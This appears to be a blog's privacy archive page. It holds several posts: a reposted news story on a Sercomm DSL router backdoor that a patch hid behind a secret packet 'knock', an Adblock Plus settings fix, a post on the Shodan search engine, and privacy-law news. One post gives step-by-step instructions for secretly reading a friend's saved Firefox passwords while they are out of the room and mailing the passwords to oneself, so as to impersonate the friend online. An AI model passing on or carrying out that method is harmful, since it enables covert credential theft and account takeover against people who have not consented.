Category Archives: Privcay

DSL router patch merely hides backdoor instead of closing it

DSL router owners got an unwelcome Christmas present. Now, the same gift is back as an Easter egg. The same security researcher who originally discovered a backdoor in 24 models of wireless DSL routers has found that a patch intended to fix that problem doesn’t actually get rid of the backdoor—it just conceals it. And the nature of the “fix” suggests that the backdoor, which is part of the firmware for wireless DSL routers based on technology from the Taiwanese manufacturer Sercomm, was an intentional feature to begin with.

back-door

Back in December, Eloi Vanderbeken of Synacktiv Digital Security was visiting his family for the Christmas holiday, and for various reasons he had the need to gain administrative access to their Linksys WAG200G DSL gateway over Wi-Fi. He discovered that the device was listening on an undocumented Internet Protocol port number, and after analyzing the code in the firmware, he found that the port could be used to send administrative commands to the router without a password.

After Vanderbeken published his results, others confirmed that the same backdoor existed on other systems based on the same Sercomm modem, including home routers from Netgear, Cisco (both under the Cisco and Linksys brands), and Diamond. In January, Netgear and other vendors published a new version of the firmware that was supposed to close the back door.

However, that new firmware apparently only hid the backdoor rather than closing it. In a PowerPoint narrative posted on April 18, Vanderbeken disclosed that the “fixed” code concealed the same communications port he had originally found (port 32764) until a remote user employed a secret “knock”—sending a specially crafted network packet that reactivates the backdoor interface.

The packet structure used to open the backdoor, Vanderbeken said, is the same used by “an old Sercomm update tool”—a packet also used in code by Wilmer van der Gaast to “rootkit” another Netgear router. The packet’s payload, in the version of the backdoor discovered by Vanderbeken in the firmware posted by Netgear, is an MD5 hash of the router’s model number (DGN1000).

The nature of the change, which leverages the same code as was used in the old firmware to provide administrative access over the concealed port, suggests that the backdoor is an intentional feature of the firmware and not just a mistake made in coding. “It’s DELIBERATE,” Vanderbeken asserted in his presentation.

There are some limitations to the use of the backdoor. Because of the format of the packets—raw Ethernet packets, not Internet Protocol packets—they would need to be sent from within the local wireless LAN, or from the Internet service provider’s equipment. But they could be sent out from an ISP as a broadcast, essentially re-opening the backdoor on any customer’s router that had been patched.

Once the backdoor is switched back on, it listens for TCP/IP traffic just as the original firmware did, giving “root shell” access—allowing anyone to send commands to the router, including getting a “dump” of its entire configuration. It also allows a remote user to access features of the hardware—such as blinking the router’s lights.

Just how widely the old, new backdoor has been spread is unknown. Vanderbeken said that because each version of the firmware is customized to the manufacturer and model number, the checksum fingerprints for each will be different. While he’s provided a proof-of-concept attack for the DGN1000, the only way to find the vulnerability would be to extract the filesystem of the firmware and search for the code that listens for the packet, called “ft_tool”, or the command to reactivate the backdoor (scfgmgr –f ).

We attempted to reach Sercomm and Netgear for comment on the backdoor. Sercomm did not respond, and a Netgear spokesperson could not yet comment on the vulnerability. Ars will update this story as more details are made available by the device manufacturers.

(via Arstechnica.com)

Adblock Plus doesn’t block everything (+fix)

adblockplus_iconNot really news for everyone, but Adblock Plus doesn’t block everything anymore. It blocks most ads on websites, providing a relatively clean browsing experience. However, some ads do get through, and Google is one player known to pay the makers of Adblock Plus to make that happen. Users of Adblock Plus, of course, aren’t amused.

Fortunately there’s a fix.

Step 1. Open a new browser screen and type:

about:config

Ignore the warning and search for:

extensions.adblockplus.subscriptions_exceptionscheckbox

Double click on the word “True” to change it into “False”. Close the screen.

Step 2: go to your add-on menu, select Adblock Plus

Click “Preferences / Filter Preferences”

Uncheck “Allow non-intrusive advertising

Close the screen. You’re done.

IE always unsafer? Sometimes not.

Let’s assume you want to prank your friend on a forum or on another website by using his/her identity. You could, of course, try to guess their username and password. You try using the name of the dog, mother, or anything else coming to mind. Sometimes this approach works, but more often it won’t. Well, there’s an easier way to do it.

The hole in ‘safe’ browsers
We all know that using Firefox or Chrome is generally safer than using the much-targeted Internet Explorer. However, IE does something right the other two browsers don’t – the amount of effort it takes to reveal saved passwords. Here is how it works. The example below assumes the use of Firefox.

Go to your friend’s house and ask if you can access the Internet from his computer. I never got “No” for an answer, and probably you won’t either. Surf to your favorite webmail application, and ask for a drink. While your friend is on his way to the kitchen, quickly do the following:

1. At the top of the Firefox window, click on the Edit menu and select Preferences
2. Click the Security panel.
3. Click Saved Passwords (the Password Manager will open)
4. To see the passwords which were saved, click Show Passwords.
5. Copy what you’re looking for and mail it to yourself.

passwords

Done!

You can do the same when using Chrome (just google for it). To get all saved passwords out of IE is a bit more difficult and requires extra software. In a sense, that makes IE safer on at least one count.

Google For Hackers

If it can’t be found on Google, it doesn’t exist. Right? Wrong. You haven’t visited Shodan yet.

Unlike Google, which crawls the Web looking for websites, Shodan navigates the Internet’s back channels. It’s a kind of “dark” Google, looking for the servers, webcams, printers, routers and all the other stuff that is connected to and makes up the Internet. Shodan runs 24/7 and collects information on about 500 million connected devices and services each month.

Nice, but who cares? Hackers do. If you would get one dollar for every device which is still accessible with the default username and password, you’d be rich. Shodan searchers have found control systems for a water park, a gas station, a hotel wine cooler and a crematorium. Cybersecurity researchers have even located command and control systems for nuclear power plants and a particle-accelerating cyclotron by using Shodan.

Typing in “Default Password” tells it all – countless companies and individuals have no clue how important (even basic) security really is. This simple search reveals countless printers, servers and system control devices that use “admin” as user name and “1234” as password. Many more connected systems require no credentials at all — all you need is a Web browser or FTP client to connect to them.

shodan

In a talk given at last year’s Defcon cybersecurity conference, independent security penetration tester Dan Tentler demonstrated how he used Shodan to find control systems for evaporative coolers, pressurized water heaters, and garage doors.

He found a car wash that could be turned on and off and a hockey rink in Denmark that could be defrosted with a click of a button. A city’s entire traffic control system was connected to the Internet and could be put into “test mode” with a single command entry. And he also found a control system for a hydroelectric plant in France with two turbines generating 3 megawatts each.

Scary stuff.

The Future Of Privacy

“We know how important it is to keep your data private. That’s why all the information you provide to us will be used for just one purpose — to help you. Information about you, your creditors and outstanding balances are never disclosed to outside parties. And don’t worry about your name, address, telephone number, or e-mail being revealed because we will never sell information about you to anyone.”

‘Apps act’ in the making

With more than 1.5 million apps now available for Android phones and Apple’s iPhone, a congressman is proposing a law that would require mobile app developers to let users know what an app’s privacy policies are when it comes to information being shared and the length of time the information is kept by a developer.

“Data has become the oil of the 21st century, and like any other resource, there must be common-sense rules of the road for this emerging challenge,” said Rep. Hank Johnson, D-Ga., in introducing the Application Privacy, Protection and Security in Congress Thursday.

“Every day millions of Americans use mobile applications to help us get through the day,” Johnson said. “But many consumers do not know their data is being collected. This privacy breach is just not 1s and 0s, it’s personal information, including our location at any given moment, our photos, messages and many of the things meant only for our friends and loved ones.

Read the rest of the article on NBC News.